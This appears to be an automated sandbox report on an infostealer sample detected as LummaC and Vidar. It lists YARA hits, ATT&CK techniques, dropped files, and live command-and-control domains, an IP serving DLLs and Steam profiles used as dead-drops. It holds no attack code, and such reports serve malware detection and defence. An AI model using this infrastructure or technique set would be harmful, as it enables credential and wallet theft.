Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2256, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3725570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3725570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2256, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	511 Process Injection	11 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	55 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	45%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\CBFBKFIDHI.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\KJEHJKJEBG.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ljhgfsd[1].exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vdshfd[1].exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
stogeneratmns.shop	100%	Avira URL Cloud	malware
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://5.75.211.162/sqlp.dllI	100%	Avira URL Cloud	malware
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://5.75.211.162/sqlp.dllJ	100%	Avira URL Cloud	malware
https://offensivedzvju.shop/apir	100%	Avira URL Cloud	malware
https://vozmeatillu.shop/$	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://player.vimeo.com	0%	URL Reputation	safe
https://www.youtube.com	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199780418869&	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://5.75.211.162KKEGI	0%	Avira URL Cloud	safe
http://cowod.AKJKJEVWXYZ1234567890isposition:	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://fragnantbui.shop/	100%	Avira URL Cloud	malware
https://stogeneratmns.shop/	100%	Avira URL Cloud	malware
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
fragnantbui.shop	100%	Avira URL Cloud	malware
offensivedzvju.shop	100%	Avira URL Cloud	malware
https://5.75.211.162/msvcp140.dll0G	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
https://5.75.211.162/mozglue.dllD	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
http://cowod.AKJKJEBGCAK	0%	Avira URL Cloud	safe
https://5.75.211.162a	0%	Avira URL Cloud	safe
https://5.75.211.162/freebl3.dllrDH	100%	Avira URL Cloud	malware
https://offensivedzvju.shop/~	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869/inventory/	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	0%	Avira URL Cloud	safe
Http://cowod.hopto.org/form-data;	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/pi	100%	Avira URL Cloud	malware
http://cowod.hoptoIEBGCAK	0%	Avira URL Cloud	safe
https://reinforcenh.shop//	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869	100%	Avira URL Cloud	malware
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
https://5.75.211.162/softokn3.dll	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
https://dbsmena.com/	0%	Avira URL Cloud	safe
https://5.75.211.162IJKJE	0%	Avira URL Cloud	safe
http://cowod.hopto.EBGCAK	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/api	100%	Avira URL Cloud	malware
https://5.75.211.162/HJEBKJEGH	100%	Avira URL Cloud	malware
http://127.0.0.1:27060	0%	Avira URL Cloud	safe
https://ghostreedmnu.shop/api	100%	Avira URL Cloud	malware
https://ghostreedmnu.shop/apiY	100%	Avira URL Cloud	malware
https://reinforcenh.shop/l	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
https://5.75.211.1620.5938.132	0%	Avira URL Cloud	safe
https://5.75.211.162/	100%	Avira URL Cloud	malware
https://dbsmena.com/vdshfd.exen	0%	Avira URL Cloud	safe
https://fragnantbui.shop/apiU	100%	Avira URL Cloud	malware
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
http://cowod.hopto.org	0%	Avira URL Cloud	safe
https://5.75.211.162/mozglue.dll	100%	Avira URL Cloud	malware
reinforcenh.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.97.3	true	true	unknown
gutterydhowi.shop	104.21.4.136	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.96.3	true	true	unknown
stogeneratmns.shop	188.114.97.3	true	true	unknown
reinforcenh.shop	104.21.77.130	true	true	unknown
drawzhotdog.shop	104.21.58.182	true	true	unknown
ghostreedmnu.shop	188.114.97.3	true	true	unknown
vozmeatillu.shop	188.114.96.3	true	true	unknown
dbsmena.com	172.105.54.160	true	false	unknown
ballotnwu.site	104.21.2.13	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop/api	true	Avira URL Cloud: malware	unknown
https://ghostreedmnu.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/	true	Avira URL Cloud: malware	unknown
reinforcenh.shop	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/mozglue.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	IEHJJE.3.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	IEHJJE.3.dr	false	URL Reputation: safe	unknown
https://offensivedzvju.shop/apir	RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	false	URL Reputation: safe	unknown
https://vozmeatillu.shop/$	RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://www.youtube.com	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dllI	RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869&	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dllJ	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJEHJKJEBG.exe, 0000000A.00000002.2348801084.0000000003B6B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000437000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162KKEGI	RegAsm.exe, 0000000D.00000002.2702734950.000000000063A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	false	Avira URL Cloud: safe	unknown
https://fragnantbui.shop/	RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
https://stogeneratmns.shop/	RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.entrust.net/rpa03	file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	false	URL Reputation: safe	unknown
http://cowod.AKJKJEVWXYZ1234567890isposition:	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	IEHJJE.3.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	IEHJJE.3.dr	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000009.00000002.2414973585.00000000015D1000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
